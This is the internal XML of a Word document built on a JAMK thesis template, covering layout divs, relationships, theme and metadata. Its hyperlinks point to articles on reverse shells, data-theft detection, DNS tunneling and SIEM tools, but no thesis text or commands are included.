            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1952929992">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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9548703">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="92092208">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="953483678">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1537617484">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1450903510">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1528641630">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565943021">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1575510526">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="259609987">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="793138001">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1720544674">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1804303041">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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731032866">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="700325246">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="907955538">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1332609597">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1478036811">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1941260681">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2106606765">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1834711448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1847591623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="213728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root@10.4.0.10:/tmp/" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.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5.png" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.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31.png" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:/Users/taante/Downloads/Taulukko" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:root@10.4.0.10" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"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image" Target="media/image19.png" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.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4.png" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.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file:///C:/Users/taante/Downloads/Taulukko" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aquasec.com/cloud-native-academy/cloud-attacks/reverse-shell-attack/" TargetMode="External" Id="Rd8f963c809db481b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/detecting-data-theft-with-wazuh-the-open-source-xdr/" TargetMode="External" Id="Re5f468a3323c4688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zenarmor.com/docs/network-security-tutorials/what-is-dns-tunneling" TargetMode="External" Id="Ra0bf5446937d40a4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/en_us/blog/learn/siem-vs-soar.html" TargetMode="External" Id="R07001dee1f2842f1"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Ladatut%20tiedostot\Opinnaytetyo_mallipohja_2022.dotx" TargetMode="External"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office-teema">
  <a:themeElements>
    <a:clrScheme name="JAMK Word">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0D004C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2066E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FDB913"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B39C"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="EA590C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="3FB8E2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A5A5A5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="3FB9E3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7861A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Asiakirja" ma:contentTypeID="0x010100794D6A09661D8A46893AE34EAD384B75" ma:contentTypeVersion="4" ma:contentTypeDescription="Luo uusi asiakirja." ma:contentTypeScope="" ma:versionID="eff7883ab4b8d9cc61411f75a010d3a4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="faa2bbd0-5c06-47cc-ab70-5745d6ef9c9a" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e347bbec5c11528dbed2eae55da60f24" ns2:_="">
    <xsd:import namespace="faa2bbd0-5c06-47cc-ab70-5745d6ef9c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2bbd0-5c06-47cc-ab70-5745d6ef9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D0765C-D186-4CE9-A1BF-A2846C6776BF}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DB4B26A0-0E05-472C-B0A4-D0064A82CE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2bbd0-5c06-47cc-ab70-5745d6ef9c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F86400-8DF1-4C7E-89CA-D93CF16F2957}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{219A2DC3-8302-4FE8-8685-0E0E7A07D574}">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Opinnaytetyo_mallipohja_2022.dotx</ap:Template>
  <ap:Application>Microsoft Word for the web</ap:Application>
  <ap:DocSecurity>0</ap:DocSecurity>
  <ap:ScaleCrop>false</ap:ScaleCrop>
  <ap:Manager/>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Opinnäytetyön raportoinnin mallipohja</dc:title>
  <dc:subject>Opinnäytetyö</dc:subject>
  <dc:creator/>
  <keywords>JAMK Opinnäytetyö; opinnäytetyö;mallipohja</keywords>
  <dc:description>JAMK ONT</dc:description>
  <lastModifiedBy>Suhonen Eelis</lastModifiedBy>
  <revision>12</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-15T00:22:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-04T22:49:33.6424691Z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0x010100794D6A09661D8A46893AE34EAD384B75</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Avainsanat">
    <vt:lpwstr>10;#opinnäytetyö|96b1f92f-9d52-4634-866c-478691c8f5f5</vt:lpwstr>
  </property>
</Properties>
</file>